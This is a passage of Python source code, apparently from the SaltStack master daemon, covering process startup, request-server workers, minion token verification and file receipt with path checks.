'{0}_update_interval'.format(backend) interval = self.opts[interval_key] except KeyError: interval = DEFAULT_INTERVAL log.warning( '%s key missing from configuration. Falling back to ' 'default interval of %d seconds', interval_key, interval ) self.buckets.setdefault( interval, OrderedDict())[(backend, update_func)] = None def update_fileserver(self, interval, backends): ''' Threading target which handles all updates for a given wait interval ''' def _do_update(): log.debug( 'Performing fileserver updates for items with an update ' 'interval of %d', interval ) for backend, update_args in six.iteritems(backends): backend_name, update_func = backend try: if update_args: log.debug( 'Updating %s fileserver cache for the following ' 'targets: %s', backend_name, update_args ) args = (update_args,) else: log.debug('Updating %s fileserver cache', backend_name) args = () update_func(*args) except Exception as exc: log.exception( 'Uncaught exception while updating %s fileserver ' 'cache', backend_name ) log.debug( 'Completed fileserver updates for items with an update ' 'interval of %d, waiting %d seconds', interval, interval ) condition = threading.Condition() _do_update() while True: with condition: condition.wait(interval) _do_update() def run(self): ''' Start the update threads ''' salt.utils.process.appendproctitle(self.__class__.__name__) # Clean out the fileserver backend cache salt.daemons.masterapi.clean_fsbackend(self.opts) for interval in self.buckets: self.update_threads[interval] = threading.Thread( target=self.update_fileserver, args=(interval, self.buckets[interval]), ) self.update_threads[interval].start() # Keep the process alive while True: time.sleep(60) class Master(SMaster): ''' The salt master server ''' def __init__(self, opts): ''' Create a salt master server instance :param dict: The salt options ''' if zmq and ZMQ_VERSION_INFO < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) SMaster.__init__(self, opts) def __set_max_open_files(self): if not HAS_RESOURCE: return # Let's check to see how our max open files(ulimit -n) setting is mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) if mof_h == resource.RLIM_INFINITY: # Unclear what to do with infinity... macOS reports RLIM_INFINITY as # hard limit,but raising to anything above soft limit fails... mof_h = mof_s log.info( 'Current values for max open files soft/hard setting: %s/%s', mof_s, mof_h ) # Let's grab, from the configuration file, the value to raise max open # files to mof_c = self.opts['max_open_files'] if mof_c > mof_h: # The configured value is higher than what's allowed log.info( 'The value for the \'max_open_files\' setting, %s, is higher ' 'than the highest value the user running salt is allowed to ' 'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h ) mof_c = mof_h if mof_s < mof_c: # There's room to raise the value. Raise it! log.info('Raising max open files value to %s', mof_c) resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h)) try: mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) log.info( 'New values for max open files soft/hard values: %s/%s', mof_s, mof_h ) except ValueError: # https://github.com/saltstack/salt/issues/1991#issuecomment-13025595 # A user under macOS reported that our 100000 default value is # still too high. log.critical( 'Failed to raise max open files setting to %s. If this ' 'value is too low, the salt-master will most likely fail ' 'to run properly.', mof_c ) def _pre_flight(self): ''' Run pre flight checks. If anything in this method fails then the master should not start up. ''' errors = [] critical_errors = [] try: os.chdir('/') except OSError as err: errors.append( 'Cannot change to root directory ({0})'.format(err) ) if self.opts.get('fileserver_verify_config', True): # Avoid circular import import salt.fileserver fileserver = salt.fileserver.Fileserver(self.opts) if not fileserver.servers: errors.append( 'Failed to load fileserver backends, the configured backends ' 'are: {0}'.format(', '.join(self.opts['fileserver_backend'])) ) else: # Run init() for all backends which support the function, to # double-check configuration try: fileserver.init() except salt.exceptions.FileserverConfigError as exc: critical_errors.append('{0}'.format(exc)) if not self.opts['fileserver_backend']: errors.append('No fileserver backends are configured') # Check to see if we need to create a pillar cache dir if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')): try: with salt.utils.files.set_umask(0o077): os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache')) except OSError: pass if self.opts.get('git_pillar_verify_config', True): try: git_pillars = [ x for x in self.opts.get('ext_pillar', []) if 'git' in x and not isinstance(x['git'], six.string_types) ] except TypeError: git_pillars = [] critical_errors.append( 'Invalid ext_pillar configuration. It is likely that the ' 'external pillar type was not specified for one or more ' 'external pillars.' ) if git_pillars: try: new_opts = copy.deepcopy(self.opts) import salt.pillar.git_pillar for repo in git_pillars: new_opts['ext_pillar'] = [repo] try: git_pillar = salt.utils.gitfs.GitPillar( new_opts, repo['git'], per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES, per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY, global_only=salt.pillar.git_pillar.GLOBAL_ONLY) except salt.exceptions.FileserverConfigError as exc: critical_errors.append(exc.strerror) finally: del new_opts if errors or critical_errors: for error in errors: log.error(error) for error in critical_errors: log.critical(error) log.critical('Master failed pre flight checks, exiting\n') sys.exit(salt.defaults.exitcodes.EX_GENERIC) def start(self): ''' Turn on the master server components ''' self._pre_flight() log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user()) enable_sigusr1_handler() enable_sigusr2_handler() self.__set_max_open_files() # Reset signals to default ones before adding processes to the process # manager. We don't want the processes being started to inherit those # signal handlers with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM): # Setup the secrets here because the PubServerChannel may need # them as well. SMaster.secrets['aes'] = { 'secret': multiprocessing.Array( ctypes.c_char, salt.utils.stringutils.to_bytes( salt.crypt.Crypticle.generate_key_string() ) ), 'reload': salt.crypt.Crypticle.generate_key_string } log.info('Creating master process manager') # Since there are children having their own ProcessManager we should wait for kill more time. self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5) pub_channels = [] log.info('Creating master publisher process') log_queue = salt.log.setup.get_multiprocessing_logging_queue() kwargs = {'_opts': self.opts} if salt.utils.platform.is_windows(): kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue() kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level() for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.PubServerChannel.factory(opts) chan.pre_fork(self.process_manager, kwargs=kwargs) pub_channels.append(chan) log.info('Creating master event publisher process') self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,), kwargs=kwargs) if self.opts.get('reactor'): if isinstance(self.opts['engines'], list): rine = False for item in self.opts['engines']: if 'reactor' in item: rine = True break if not rine: self.opts['engines'].append({'reactor': {}}) else: if 'reactor' not in self.opts['engines']: log.info('Enabling the reactor engine') self.opts['engines']['reactor'] = {} salt.engines.start_engines(self.opts, self.process_manager) # must be after channels log.info('Creating master maintenance process') self.process_manager.add_process(Maintenance, args=(self.opts,), kwargs=kwargs) if self.opts.get('event_return'): log.info('Creating master event return process') self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,), kwargs=kwargs) ext_procs = self.opts.get('ext_processes', []) for proc in ext_procs: log.info('Creating ext_processes process: %s', proc) try: mod = '.'.join(proc.split('.')[:-1]) cls = proc.split('.')[-1] _tmp = __import__(mod, globals(), locals(), [cls], -1) cls = _tmp.__getattribute__(cls) self.process_manager.add_process(cls, args=(self.opts,), kwargs=kwargs) except Exception: log.error('Error creating ext_processes process: %s', proc) if HAS_HALITE and 'halite' in self.opts: log.info('Creating master halite process') self.process_manager.add_process(Halite, args=(self.opts['halite'],), kwargs=kwargs) # TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there) if self.opts['con_cache']: log.info('Creating master concache process') self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,), kwargs=kwargs) # workaround for issue #16315, race condition log.debug('Sleeping for two seconds to let concache rest') time.sleep(2) log.info('Creating master request server process') self.process_manager.add_process( ReqServer, args=(self.opts, self.key, self.master_key, SMaster.secrets), kwargs=kwargs, name='ReqServer') self.process_manager.add_process( FileserverUpdate, args=(self.opts,), kwargs=kwargs) # Fire up SSDP discovery publisher if self.opts['discovery']: if salt.utils.ssdp.SSDPDiscoveryServer.is_available(): self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer( port=self.opts['discovery']['port'], listen_ip=self.opts['interface'], answer={'mapping': self.opts['discovery'].get('mapping', {})}).run, kwargs=kwargs) else: log.error('Unable to load SSDP: asynchronous IO is not available.') if sys.version_info.major == 2: log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.') # Install the SIGINT/SIGTERM handlers if not done so far if signal.getsignal(signal.SIGINT) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGINT, self._handle_signals) if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGTERM, self._handle_signals) self.process_manager.run() def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument # escalate the signals to the process manager self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) # kill any remaining processes self.process_manager.kill_children() time.sleep(1) sys.exit(0) class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' Manage the Halite server ''' def __init__(self, hopts, **kwargs): ''' Create a halite instance :param dict hopts: The halite options ''' super(Halite, self).__init__(**kwargs) self.hopts = hopts # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self._is_child = True self.__init__( state['hopts'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'], _opts=state['hopts'] ) def __getstate__(self): return { 'hopts': self.hopts, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def run(self): ''' Fire up halite! ''' salt.utils.process.appendproctitle(self.__class__.__name__) halite.start(self.hopts) class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' Starts up the master request server, minions send results to this interface. ''' def __init__(self, opts, key, mkey, secrets=None, **kwargs): ''' Create a request server :param dict opts: The salt options dictionary :key dict: The user starting the server and the AES key :mkey dict: The user starting the server and the RSA key :rtype: ReqServer :returns: Request server ''' super(ReqServer, self).__init__(**kwargs) self.opts = opts self.master_key = mkey # Prepare the AES key self.key = key self.secrets = secrets # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self._is_child = True self.__init__( state['opts'], state['key'], state['mkey'], secrets=state['secrets'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'], _opts=state['opts'] ) def __getstate__(self): return { 'opts': self.opts, 'key': self.key, 'mkey': self.master_key, 'secrets': self.secrets, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument self.destroy(signum) super(ReqServer, self)._handle_signals(signum, sigframe) def __bind(self): ''' Binds the reply server ''' if self.log_queue is not None: salt.log.setup.set_multiprocessing_logging_queue(self.log_queue) if self.log_queue_level is not None: salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level) salt.log.setup.setup_multiprocessing_logging(self.log_queue) if self.secrets is not None: SMaster.secrets = self.secrets dfn = os.path.join(self.opts['cachedir'], '.dfn') if os.path.isfile(dfn): try: if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK): # Cannot delete read-only files on Windows. os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR) os.remove(dfn) except os.error: pass # Wait for kill should be less then parent's ProcessManager. self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager', wait_for_kill=1) req_channels = [] tcp_only = True for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.ReqServerChannel.factory(opts) chan.pre_fork(self.process_manager) req_channels.append(chan) if transport != 'tcp': tcp_only = False kwargs = {} if salt.utils.platform.is_windows(): kwargs['log_queue'] = self.log_queue kwargs['log_queue_level'] = self.log_queue_level # Use one worker thread if only the TCP transport is set up on # Windows and we are using Python 2. There is load balancer # support on Windows for the TCP transport when using Python 3. if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1: log.warning('TCP transport supports only 1 worker on Windows ' 'when using Python 2.') self.opts['worker_threads'] = 1 # Reset signals to default ones before adding processes to the process # manager. We don't want the processes being started to inherit those # signal handlers with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM): for ind in range(int(self.opts['worker_threads'])): name = 'MWorker-{0}'.format(ind) self.process_manager.add_process(MWorker, args=(self.opts, self.master_key, self.key, req_channels, name), kwargs=kwargs, name=name) self.process_manager.run() def run(self): ''' Start up the ReqServer ''' self.__bind() def destroy(self, signum=signal.SIGTERM): if hasattr(self, 'process_manager'): self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) self.process_manager.kill_children() # pylint: disable=W1701 def __del__(self): self.destroy() # pylint: enable=W1701 class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' The worker multiprocess instance to manage the backend operations for the salt master. ''' def __init__(self, opts, mkey, key, req_channels, name, **kwargs): ''' Create a salt master worker process :param dict opts: The salt options :param dict mkey: The user running the salt master and the AES key :param dict key: The user running the salt master and the RSA key :rtype: MWorker :return: Master worker ''' kwargs['name'] = name self.name = name super(MWorker, self).__init__(**kwargs) self.opts = opts self.req_channels = req_channels self.mkey = mkey self.key = key self.k_mtime = 0 self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0}) self.stat_clock = time.time() # We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'. # Otherwise, 'SMaster.secrets' won't be copied over to the spawned process # on Windows since spawning processes on Windows requires pickling. # These methods are only used when pickling so will not be used on # non-Windows platforms. def __setstate__(self, state): self._is_child = True super(MWorker, self).__init__( log_queue=state['log_queue'], log_queue_level=state['log_queue_level'], _opts=state['opts'] ) self.opts = state['opts'] self.req_channels = state['req_channels'] self.mkey = state['mkey'] self.key = state['key'] self.k_mtime = state['k_mtime'] SMaster.secrets = state['secrets'] def __getstate__(self): return { 'opts': self.opts, 'req_channels': self.req_channels, 'mkey': self.mkey, 'key': self.key, 'k_mtime': self.k_mtime, 'secrets': SMaster.secrets, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _handle_signals(self, signum, sigframe): for channel in getattr(self, 'req_channels', ()): channel.close() super(MWorker, self)._handle_signals(signum, sigframe) def __bind(self): ''' Bind to the local port ''' # using ZMQIOLoop since we *might* need zmq in there install_zmq() self.io_loop = ZMQDefaultLoop() self.io_loop.make_current() for req_channel in self.req_channels: req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily? try: self.io_loop.start() except (KeyboardInterrupt, SystemExit): # Tornado knows what to do pass @tornado.gen.coroutine def _handle_payload(self, payload): ''' The _handle_payload method is the key method used to figure out what needs to be done with communication to the server Example cleartext payload generated for 'salt myminion test.ping': {'enc': 'clear', 'load': {'arg': [], 'cmd': 'publish', 'fun': 'test.ping', 'jid': '', 'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj', 'kwargs': {'show_jid': False, 'show_timeout': False}, 'ret': '', 'tgt': 'myminion', 'tgt_type': 'glob', 'user': 'root'}} :param dict payload: The payload route to the appropriate handler ''' key = payload['enc'] load = payload['load'] ret = {'aes': self._handle_aes, 'clear': self._handle_clear}[key](load) raise tornado.gen.Return(ret) def _post_stats(self, start, cmd): ''' Calculate the master stats and fire events with stat info ''' end = time.time() duration = end - start self.stats[cmd]['mean'] = (self.stats[cmd]['mean'] * (self.stats[cmd]['runs'] - 1) + duration) / self.stats[cmd]['runs'] if end - self.stat_clock > self.opts['master_stats_event_iter']: # Fire the event with the stats and wipe the tracker self.aes_funcs.event.fire_event({'time': end - self.stat_clock, 'worker': self.name, 'stats': self.stats}, tagify(self.name, 'stats')) self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0}) self.stat_clock = end def _handle_clear(self, load): ''' Process a cleartext command :param dict load: Cleartext payload :return: The result of passing the load to a function in ClearFuncs corresponding to the command specified in the load's 'cmd' key. ''' log.trace('Clear payload received with command %s', load['cmd']) cmd = load['cmd'] method = self.clear_funcs.get_method(cmd) if not method: return {}, {'fun': 'send_clear'} if self.opts['master_stats']: start = time.time() self.stats[cmd]['runs'] += 1 ret = method(load), {'fun': 'send_clear'} if self.opts['master_stats']: self._post_stats(start, cmd) return ret def _handle_aes(self, data): ''' Process a command sent via an AES key :param str load: Encrypted payload :return: The result of passing the load to a function in AESFuncs corresponding to the command specified in the load's 'cmd' key. ''' if 'cmd' not in data: log.error('Received malformed command %s', data) return {} cmd = data['cmd'] log.trace('AES payload received with command %s', data['cmd']) method = self.aes_funcs.get_method(cmd) if not method: return {}, {'fun': 'send'} if self.opts['master_stats']: start = time.time() self.stats[cmd]['runs'] += 1 ret = self.aes_funcs.run_func(data['cmd'], data) if self.opts['master_stats']: self._post_stats(start, cmd) return ret def run(self): ''' Start a Master Worker ''' salt.utils.process.appendproctitle(self.name) self.clear_funcs = ClearFuncs( self.opts, self.key, ) self.aes_funcs = AESFuncs(self.opts) salt.utils.crypt.reinit_crypto() self.__bind() class TransportMethods(object): ''' Expose methods to the transport layer, methods with their names found in the class attribute 'expose_methods' will be exposed to the transport layer via 'get_method'. ''' expose_methods = () def get_method(self, name): ''' Get a method which should be exposed to the transport layer ''' if name in self.expose_methods: try: return getattr(self, name) except AttributeError: log.error("Expose method not found: %s", name) else: log.error("Requested method not exposed: %s", name) # TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests class AESFuncs(TransportMethods): ''' Set up functions that are available when the load is encrypted with AES ''' expose_methods = ( 'verify_minion', '_master_tops', '_ext_nodes', '_master_opts', '_mine_get', '_mine', '_mine_delete', '_mine_flush', '_file_recv', '_pillar', '_minion_event', '_handle_minion_event', '_return', '_syndic_return', '_minion_runner', 'pub_ret', 'minion_pub', 'minion_publish', 'revoke_auth', 'run_func', '_serve_file', '_file_find', '_file_hash', '_file_find_and_stat', '_file_list', '_file_list_emptydirs', '_dir_list', '_symlink_list', '_file_envs', ) def __init__(self, opts): ''' Create a new AESFuncs :param dict opts: The salt options :rtype: AESFuncs :returns: Instance for handling AES operations ''' self.opts = opts self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) self.serial = salt.payload.Serial(opts) self.ckminions = salt.utils.minions.CkMinions(opts) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Create the master minion to access the external job cache self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False, ignore_config_errors=True ) self.__setup_fileserver() self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts) def __setup_fileserver(self): ''' Set the local file objects from the file server interface ''' # Avoid circular import import salt.fileserver self.fs_ = salt.fileserver.Fileserver(self.opts) self._serve_file = self.fs_.serve_file self._file_find = self.fs_._find_file self._file_hash = self.fs_.file_hash self._file_hash_and_stat = self.fs_.file_hash_and_stat self._file_list = self.fs_.file_list self._file_list_emptydirs = self.fs_.file_list_emptydirs self._dir_list = self.fs_.dir_list self._symlink_list = self.fs_.symlink_list self._file_envs = self.fs_.file_envs def __verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key :param str id_: A minion ID :param str token: A string signed with the minion private key :rtype: bool :return: Boolean indicating whether or not the token can be verified. ''' if not salt.utils.verify.valid_id(self.opts, id_): return False pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_) try: pub = salt.crypt.get_rsa_pub_key(pub_path) except (IOError, OSError): log.warning( 'Salt minion claiming to be %s attempted to communicate with ' 'master, but key could not be read and verification was denied.', id_ ) return False except (ValueError, IndexError, TypeError) as err: log.error('Unable to load public key "%s": %s', pub_path, err) try: if salt.crypt.public_decrypt(pub, token) == b'salt': return True except ValueError as err: log.error('Unable to decrypt token: %s', err) log.error( 'Salt minion claiming to be %s has attempted to communicate with ' 'the master and could not be verified', id_ ) return False def verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key :param str id_: A minion ID :param str token: A string signed with the minion private key :rtype: bool :return: Boolean indicating whether or not the token can be verified. ''' return self.__verify_minion(id_, token) def __verify_minion_publish(self, clear_load): ''' Verify that the passed information authorized a minion to execute :param dict clear_load: A publication load from a minion :rtype: bool :return: A boolean indicating if the minion is allowed to publish the command in the load ''' # Verify that the load is valid if 'peer' not in self.opts: return False if not isinstance(self.opts['peer'], dict): return False if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')): return False # If the command will make a recursive publish don't run if clear_load['fun'].startswith('publish.'): return False # Check the permissions for this minion if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning( 'Minion id %s is not who it says it is and is attempting ' 'to issue a peer command', clear_load['id'] ) return False clear_load.pop('tok') perms = [] for match in self.opts['peer']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer'][match], list): perms.extend(self.opts['peer'][match]) if ',' in clear_load['fun']: # 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']] clear_load['fun'] = clear_load['fun'].split(',') arg_ = [] for arg in clear_load['arg']: arg_.append(arg.split()) clear_load['arg'] = arg_ # finally, check the auth of the load return self.ckminions.auth_check( perms, clear_load['fun'], clear_load['arg'], clear_load['tgt'], clear_load.get('tgt_type', 'glob'), publish_validate=True) def __verify_load(self, load, verify_keys): ''' A utility function to perform common verification steps. :param dict load: A payload received from a minion :param list verify_keys: A list of strings that should be present in a given load :rtype: bool :rtype: dict :return: The original load (except for the token) if the load can be verified. False if the load is invalid. ''' if any(key not in load for key in verify_keys): return False if 'tok' not in load: log.error( 'Received incomplete call from %s for \'%s\', missing \'%s\'', load['id'], inspect_stack()['co_name'], 'tok' ) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning('Minion id %s is not who it says it is!', load['id']) return False if 'tok' in load: load.pop('tok') return load def _master_tops(self, load): ''' Return the results from an external node classifier if one is specified :param dict load: A payload received from a minion :return: The results from an external node classifier ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} return self.masterapi._master_tops(load, skip_verify=True) # Needed so older minions can request master_tops _ext_nodes = _master_tops def _master_opts(self, load): ''' Return the master options to the minion :param dict load: A payload received from a minion :rtype: dict :return: The master options ''' mopts = {} file_roots = {} envs = self._file_envs() for saltenv in envs: if saltenv not in file_roots: file_roots[saltenv] = [] mopts['file_roots'] = file_roots mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy'] mopts['env_order'] = self.opts['env_order'] mopts['default_top'] = self.opts['default_top'] if load.get('env_only'): return mopts mopts['renderer'] = self.opts['renderer'] mopts['failhard'] = self.opts['failhard'] mopts['state_top'] = self.opts['state_top'] mopts['state_top_saltenv'] = self.opts['state_top_saltenv'] mopts['nodegroups'] = self.opts['nodegroups'] mopts['state_auto_order'] = self.opts['state_auto_order'] mopts['state_events'] = self.opts['state_events'] mopts['state_aggregate'] = self.opts['state_aggregate'] mopts['jinja_env'] = self.opts['jinja_env'] mopts['jinja_sls_env'] = self.opts['jinja_sls_env'] mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks'] mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks'] return mopts def _mine_get(self, load): ''' Gathers the data from the specified minions' mine :param dict load: A payload received from a minion :rtype: dict :return: Mine data from the specified minions ''' load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok')) if load is False: return {} else: return self.masterapi._mine_get(load, skip_verify=True) def _mine(self, load): ''' Store the mine data :param dict load: A payload received from a minion :rtype: bool :return: True if the data has been stored in the mine ''' load = self.__verify_load(load, ('id', 'data', 'tok')) if load is False: return {} return self.masterapi._mine(load, skip_verify=True) def _mine_delete(self, load): ''' Allow the minion to delete a specific function from its own mine :param dict load: A payload received from a minion :rtype: bool :return: Boolean indicating whether or not the given function was deleted from the mine ''' load = self.__verify_load(load, ('id', 'fun', 'tok')) if load is False: return {} else: return self.masterapi._mine_delete(load) def _mine_flush(self, load): ''' Allow the minion to delete all of its own mine contents :param dict load: A payload received from a minion ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} else: return self.masterapi._mine_flush(load, skip_verify=True) def _file_recv(self, load): ''' Allows minions to send files to the master, files are sent to the master file cache ''' if any(key not in load for key in ('id', 'path', 'loc')): return False if not isinstance(load['path'], list): return False if not self.opts['file_recv']: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False file_recv_max_size = 1024*1024 * self.opts['file_recv_max_size'] if 'loc' in load and load['loc'] < 0: log.error('Invalid file pointer: load[loc] < 0') return False if len(load['data']) + load.get('loc', 0) > file_recv_max_size: log.error( 'file_recv_max_size limit of %d MB exceeded! %s will be ' 'truncated. To successfully push this file, adjust ' 'file_recv_max_size to an integer (in MB) large enough to ' 'accommodate it.', file_recv_max_size, load['path'] ) return False if 'tok' not in load: log.error( 'Received incomplete call from %s for \'%s\', missing \'%s\'', load['id'], inspect_stack()['co_name'], 'tok' ) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning('Minion id %s is not who it says it is!', load['id']) return {} load.pop('tok') # Join path sep_path = os.sep.join(load['path']) # Path normalization should have been done by the sending # minion but we can't guarantee it. Re-do it here. normpath = os.path.normpath(sep_path) # Ensure that this safety check is done after the path # have been normalized. if os.path.isabs(normpath) or '../' in load['path']: # Can overwrite master files!! return False cpath = os.path.join( self.opts['cachedir'], 'minions', load['id'], 'files', normpath) # One last safety check here if not os.path.normpath(cpath).startswith(self.opts['cachedir']): log.warning( 'Attempt to write received file outside of master cache ' 'directory! Requested path: %s. Access denied.', cpath ) return False cdir = os.path.dirname(cpath) if not os.path.isdir(cdir): try: os.makedirs(cdir) except os.error: pass if os.path.isfile(cpath) and load['loc'] != 0: mode = 'ab' else: mode = 'wb' with salt.utils.files.fopen(cpath, mode) as fp_: if load['loc']: fp_.seek(load['loc']) fp_.write(salt.utils.stringutils.to_bytes(load['data'])) return True def _pillar(self, load): ''' Return the pillar data for the minion :param dict load: Minion payload :rtype: dict :return: The pillar data for the minion ''' if any(key not in load for key in ('id', 'grains')): return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False load['grains']['id'] = load['id'] pillar = salt.pillar.get_pillar( self.opts, load['grains'], load['id'], load.get('saltenv', load.get('env')), ext=load.get('ext'), pillar_override=load.get('pillar_override', {}), pillarenv=load.get('pillarenv'), extra_minion_data=load.get('extra_minion_data')) data = pillar.compile_pillar() self.fs_.update_opts() if self.opts.get('minion_data_cache', False): self.masterapi.cache.store('minions/{0}'.format(load['id']), 'data', {'grains': load['grains'], 'pillar': data}) if self.opts.get('minion_data_cache_events') is True: self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion')) return data def _minion_event(self, load): ''' Receive an event from the minion and fire it on the master event interface :param dict load: The minion payload ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} # Route to master event bus self.masterapi._minion_event(load) # Process locally self._handle_minion_event(load) def _handle_minion_event(self, load): ''' Act on specific events from minions ''' id_ = load['id'] if load.get('tag', '') == '_salt_error': log.error( 'Received minion error from [%s]: %s', id_, load['data']['message'] ) for event in load.get('events', []): event_data = event.get('data', {}) if 'minions' in event_data: jid = event_data.get('jid') if not jid: continue minions = event_data['minions'] try: salt.utils.job.store_minions( self.opts, jid, minions, mminion=self.mminion, syndic_id=id_) except (KeyError, salt.exceptions.SaltCacheError) as exc: log.error( 'Could not add minion(s) %s for job %s: %s', minions, jid, exc ) def _return(self, load): ''' Handle the return data sent from the minions. Takes the return, verifies it and fires it on the master event bus. Typically, this event is consumed by the Salt CLI waiting on the other end of the event bus but could be heard by any listener on the bus. :param dict load: The minion payload ''' if self.opts['require_minion_sign_messages'] and 'sig' not in load: log.critical( '_return: Master is requiring minions to sign their ' 'messages, but there is no signature in this payload from ' '%s.', load['id'] ) return False if 'sig' in load: log.trace('Verifying signed event publish from minion') sig = load.pop('sig') this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id'])) serialized_load = salt.serializers.msgpack.serialize(load) if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig): log.info('Failed to verify event signature from minion %s.', load['id']) if self.opts['drop_messages_signature_fail']: log.critical( 'Drop_messages_signature_fail is enabled, dropping ' 'message from %s', load['id'] ) return False else: log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.') load['sig'] = sig try: salt.utils.job.store_job( self.opts, load, event=self.event, mminion=self.mminion) except salt.exceptions.SaltCacheError: log.error('Could not store job information for load: %s', load) def _syndic_return(self, load): ''' Receive a syndic minion return and format it to look like returns from individual minions. :param dict load: The minion payload ''' loads = load.get('load') if not isinstance(loads, list): loads = [load] # support old syndics not aggregating returns for load in loads: # Verify the load if any(key not in load for key in ('return', 'jid', 'id')): continue # if we have a load, save it if load.get('load'): fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](load['jid'], load['load']) # Register the syndic syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id']) if not os.path.exists(syndic_cache_path): path_name = os.path.split(syndic_cache_path)[0] if not os.path.exists(path_name): os.makedirs(path_name) with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh: wfh.write('') # Format individual return loads for key, item in six.iteritems(load['return']): ret = {'jid': load['jid'], 'id': key} ret.update(item) if 'master_id' in load: ret['master_id'] = load['master_id'] if 'fun' in load: ret['fun'] = load['fun'] if 'arg' in load: ret['fun_args'] = load['arg'] if 'out' in load: ret['out'] = load['out'] if 'sig' in load: ret['sig'] = load['sig'] self._return(ret) def minion_runner(self, clear_load): ''' Execute a runner from a minion, return the runner's function data :param dict clear_load: The minion payload :rtype: dict :return: The runner function data ''' load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok')) if load is False: return {} else: return self.masterapi.minion_runner(clear_load) def pub_ret(self, load): ''' Request the return data from a specific jid, only allowed if the requesting minion also initialted the execution. :param dict load: The minion payload :rtype: dict :return: Return data corresponding to a given JID ''' load = self.__verify_load(load, ('jid', 'id', 